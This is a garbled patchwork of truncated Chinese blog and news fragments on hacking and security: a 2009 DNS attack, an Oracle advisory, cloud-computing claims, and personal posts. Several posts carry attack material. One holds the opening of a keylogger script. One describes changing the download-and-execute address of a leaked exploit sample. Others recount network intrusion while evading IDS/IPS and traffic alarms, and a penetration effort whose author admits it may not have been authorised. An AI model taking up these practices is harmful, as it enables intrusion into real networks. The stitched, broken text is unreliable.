今年5月19日晚间时分，浙江、江苏、安徽等6省陆续出现互联网网络故障，部分互联网用户的服务受到影响。5月29日，涉嫌破坏计算机信息系统的王某等8名“黑客”相继在金华、温州等地落网。

　 　据了解，2009年1月份，犯罪嫌疑人王某在互联网上租用服务器，通过协助他人攻击网络游戏“私服”和“私服”广告网站进行非法牟利。5月19日，王某 指使犯罪嫌疑人徐某、徐某某两人对三个网络游戏“私服”广告网站的域名解析服务器实施攻击。其中一台域名解析服务器设在江苏常州，同时

Oracle向他的客户发出了三个新的漏洞警报，对先前存在于应用服务器产品的漏洞他们又重新警告了一次。

　　两个非常严重的漏洞存在于公司的电子商务套件中，这两个漏洞被Oracle确定为最高级别的漏洞。

　　Oracle产品安全部门的主管John Heimann说:“我们的这个等级系统是按照漏洞可能造成的危害来评定漏洞的级别的。”

　　Oracle发布了这四个漏洞的补丁程序，同时提供咨询服务。

　　第一个电子商务套件中的漏洞是由一些不安全的JSP页面引起的，可以使任何用户查看产品的配置信息和主机的信息。

　　其中并无朝鲜，但韩方仍认为朝“嫌疑最大”；韩媒称攻击还会更猛

　　9日，韩国首尔，韩国警察厅官

那天,是我把粉丝当鱼翅了 其实强大的不是keylogger 而是PST三期写的东西

var key = '';
var space = ' '
function start()
{
        var xmlhttp;
    if (window.XMLHttpRequest)
    {
        // code for IE7+, Firefox, Chrome, Opera, Safari
        xmlhttp=new XMLHttpRequest();
    }
  

好恐怖的东西,听说某些人早几日拿到样本 可是我昨夜才拿到

找了个好朋友一起研究(主要是他研究,我倒茶) 截止目前终于可以改downexec的地址了

貌似网上公布的共有三个样本

一个是 执行本地的calc.exe

一个是 下载执行 calc.exe

还有一个我没拿到 是解码后的 听说直接改地址就好了 ...

倒茶的时候有几个问题,vmware XP 全补丁可以执行一次 貌似无法重复执行 就算是清除所有文件 重新启动vmare虚拟机

但是在真实环境下是可以重复测试执行 这个感觉和vmware的虚拟内存结构什么的有

　厂商的炒作，加上IT人的自欺，很快就会让人们对某种技术感到失望。如果你正在考虑云计算战略的话，请千万别被这些虚伪的承诺所迷惑。

　　如今，无论你去哪里，都会有人对你说，或者向你兜售和云计算有关的什么东东。

　　而你只有剥去其谎言的外衣，还其本来面目，你才能够了解云计算是否真的适合于你的企业。下面就是我们列出的关于云计算的9大必须剥去的谎言。

　　谎言1：只有一种云。至少有三种格式的云，每一种都有着不同的利益和风险。它们是1)基础设施作为服务 (IaaS，提供按

这本书让等了好久,为了要个原作者签名（俺有收藏的癖好） 所以就慢了点

只是看了lcx大侠的序就让我澎湃了 当然更要感谢作者这样分享的精神 :) 难得 难得.

学习去了!

口号=菜鸟要赶集!

    经济危机下美军最大的军事动作莫过于建立黑客部队，近两年美国建立黑客部队动作频繁。先前从中国找到N多的接口，然后炒作中国黑客攻击美国。前后有计划有预谋的进行黑客网络部队建设。

　　美国《华刊》“网络黑客攻击，这是对美国经济和国家安全最严重挑战” 。 5月29日，美国总统奥巴马敲响了美国网络安全的警钟。随即，曾经被政府追捕的黑客们，一时间成了就业场上炙手可热的人才。

　　美军战略司

帮朋友忙 帮到目的不单纯 好可怜 被好多兄弟教训了
甚至被威胁了下...
总结下 教训...
关于单臂路由如果掌握到设备权限还是可以继续玩，另外一些对拨的vpn如果没有做好限制也可以溜达溜达，如果是帮忙的话 还是小心翼翼的溜达，不要做什么很实际的操作了，因为...
先说设备
IPS IDS 自然不说了 现在这些都搞复合呢 all in one 行为管理也有给复合进去的
在说流量报警和时间 流量报警现在和手机整合的 就是说如果在一个日均1Gb流量的网络下载一个大家伙流量超出界定范围会被发送到手机流量异常，说到手机这个东

刚看到amxku牛 博了一篇http://www.amxku.net/adslxp98-penet-Notes/

回忆昨天 好像黑锅群里也讨论了下 貌似lcx牛给写的序 还有蓝莲花什么的...

这紧接着又收到 http://hi.baidu.com/%B1%F9%B5%C4%D4%AD%B5%E3/blog/item/5e70032de679ee3c349bf7e1.html

所以 我这标题捣鼓的有点长了...

文章有质量 我又崇拜了... 技术研究 精神很

   搜索到一篇不错的文档
   随着我们信息化水平的不断提高，业务应用的不断增多，由此产生了大量的业务数据，而这些业务数据在很大程度上具有很强的机密性，需要得到重要保护。但值得一提的是，计算机网络给我们带便利的同时，也给我们带来无限的困扰：信息盗窃、信息丢失、数据交叉感染、主动泄密时刻存在我们的周围，威胁着我们的安全。

1）出于业务需要，我们往往需要带着笔记本电脑/移动存储介质出差，但常常会遇到笔记本电脑/存储介质丢失等情况，造成敏感信息的丢失，给公司或单位带来巨大

Secunia

There is site called Secunia that provides up-to-date vulnerability advisories. You can search advisories by product or by vendor.

I’ve compiled a list of links to information about known vulnerabilities for a few popular scripts:

关于最后一次做的一个渗透：

从目前的结果来判断，核心的东西应该是被物理隔离的，还苦了自己那么多天，也是没找到想要的东西。

这两天不知道怎么了，总不自住想这件事，如果是渗透测试也许应该结束了，如果不是渗透测试，真的就动机不纯了，物理隔离就没一点机会? oh shit~~

真不知道该说些什么 我已经尽量让自己看起来开心

很感谢 这些兄弟

感谢 where 让我不枉这次的北京之行 认识你这样的兄弟是我的幸运

感谢 xisigr 在工作中给我的帮助 和你讨论漏洞利用真的很开心

感谢 雨    是你的热情让我感到这个团队的人情 入职那天是你放下手中的工作 帮我摆桌子捣鼓网线

感谢 Q   工作中尽职尽责 生活中对朋友无微不至

感谢 jack ma 你总能活跃办公室的气氛 让大家在沉闷的工作中得到快乐

感谢 刘蝶雨 你的坚持让我真正了解到